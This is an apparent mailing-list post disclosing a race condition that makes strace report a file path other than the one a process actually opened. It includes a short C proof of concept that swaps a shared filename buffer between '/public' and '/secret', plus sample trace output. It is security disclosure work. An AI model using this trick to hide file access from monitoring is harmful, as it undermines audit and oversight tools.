strace can lie

[pavel () SUSE CZ (Pavel Machek)]

Hi!

When you see snippet from strace, that says:

open("/etc/passwd", O_RDONLY)           = 3

Do you trust it? You should not.

Malicious program could open _any_ file on filesystem with this
syscall. Here is example of such malicious program:

void
main(void)
{
  char *c = 0x94000000;
  open( "/tmp/delme", O_RDWR );
  mmap( c, 4096, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_SHARED, 3, 0);
  *c = 0;
  if (fork()) {
    while(1) {
      strcpy( c, "/public" );
      strcpy( c, "/secret" );
    }
  } else
    while (1)
      open( c, 0 );
}

Depending on races, /public or /secret is printed with strace. This
can be reproduced even on UP and easiest way to do so is to make
/public file readable, and then look if you get

[pid   224] open("/public", O_RDONLY)  = 718
[pid   224] open("/secret", O_RDONLY)  = 719
[pid   224] open("/public", O_RDONLY)  = 720

snippet like this. It is impossible for kernel to open non-existent
file; that means that strace printed something that did not actually
happen.

Any ideas how to get rid of this problem? It is nasty. It is very
nasty and makes strace unusable for anything security-sensitive.
                                                                Pavel
PS: You don't need two processes sharing memory. Memory-mapped file
will do the job. This was just illustration.

--
I'm pavel () ucw cz. "In my country we have almost anarchy and I don't care."
Panos Katsaloulis describing me w.r.t. patents me at discuss () linmodems org